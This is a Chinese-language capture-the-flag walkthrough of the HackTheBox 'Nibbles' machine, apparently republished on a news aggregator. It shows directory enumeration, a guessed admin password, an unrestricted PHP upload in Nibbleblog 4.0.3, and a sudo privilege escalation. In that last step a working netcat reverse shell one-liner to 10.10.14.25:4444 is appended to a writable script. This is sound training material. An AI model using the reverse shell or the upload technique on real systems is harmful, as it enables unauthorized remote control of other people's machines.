您的位置:首页 > 娱乐 > 明星 > HackTheBox-Machines--Nibbles

HackTheBox-Machines--Nibbles

2025/1/8 15:39:21 来源:https://blog.csdn.net/sycamorelg/article/details/139322068  浏览:    关键词:HackTheBox-Machines--Nibbles
Nibbles 测试过程

1 信息收集

NMAP

在这里插入图片描述

80 端口

在这里插入图片描述

  网站出了打印出“Hello world!”外,无其他可利用信息,但是查看网页源代码时,发现存在一个 /nibbleblog 文件夹

在这里插入图片描述

  检查了 http://10.129.140.63/nibbleblog/ ,发现了 /index.php、/feed.php,没有其他可利用的信息

在这里插入图片描述

目录扫描

在这里插入图片描述

1. /content 目录

在这里插入图片描述

在这里插入图片描述

2. /admin.php 目录

在这里插入图片描述

  用户名:admin,爆破密码:nibbles,登录后页面如下

在这里插入图片描述

3. /README 目录

  发现Nibbleblog CMS 的版本号为:4.0.3

在这里插入图片描述

2 Nibbleblog 漏洞利用

在这里插入图片描述

Nibbleblog 4.0.3 代码执行漏洞原理

  当通过 My image 插件上传图片文件时,NibbleBlog 4.0.3 会保留上传文件的原始扩展名。不会检查此扩展名或实际文件类型,因此可以上传 PHP 文件并获得代码执行。

手工验证

在这里插入图片描述

  上传文件路径为:http://10.129.140.63/nibbleblog/content/private/plugins/my_image/image.php,访问 image.php,并忽略报错。ncat 监听到一个shell。

在这里插入图片描述

在这里插入图片描述

PTY Shell

在这里插入图片描述
在这里插入图片描述

3 权限提升

SUDO 提权

sudo -l

在这里插入图片描述

  检查 :/home/nibbler/personal/stuff/monitor.sh 文件

nibbler@Nibbles:/home/nibbler$ ls -ll 
ls -ll 
total 8
-r-------- 1 nibbler nibbler 1855 Dec 10  2017 personal.zip
-r-------- 1 nibbler nibbler   33 May 30 01:40 user.txtnibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive:  personal.zipcreating: personal/creating: personal/stuff/inflating: personal/stuff/monitor.sh  nibbler@Nibbles:/home/nibbler$ cd personal/stuff
cd personal/stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -ll
ls -ll
total 4
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
cat monitor.sh#####################################################################################################                                        Tecmint_monitor.sh                                        ## Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script/      ## If any bug, report us in the link below                                                          ## Free to use/edit/distribute the code below by                                                    ## giving proper credit to Tecmint.com and Author                                                   ##                                                                                                  #####################################################################################################

  文件可写,可以将shell文件写入monitor.sh文件中

nibbler@Nibbles:/home/nibbler/personal/stuff$
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 4444 > /tmp/f" >> monitor.shnibbler@Nibbles:/home/nibbler/personal/stuff$ 
sudo /home/nibbler/personal/stuff/monitor.sh

在这里插入图片描述

在这里插入图片描述

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

最新新闻

热搜词

Cyclic Cipher 深入解析淘客返利系统中的业务流程与架构模式 mv指令详解 .NET 响应式编程 System.Reactive 系列文章(二):深入理解 IObservableT 和 IObserverT 代码随想录:二叉树的递归遍历 Python-Drissionpage双击备份

声明:本站所有新闻及新闻图片来源于其他网站,如有侵权,请及时联系我们!

客户服务 | 关于我们 | 版权声明

版权所有:

Copyright 2024 尧图网 All Rights Reserved.QQ:809451989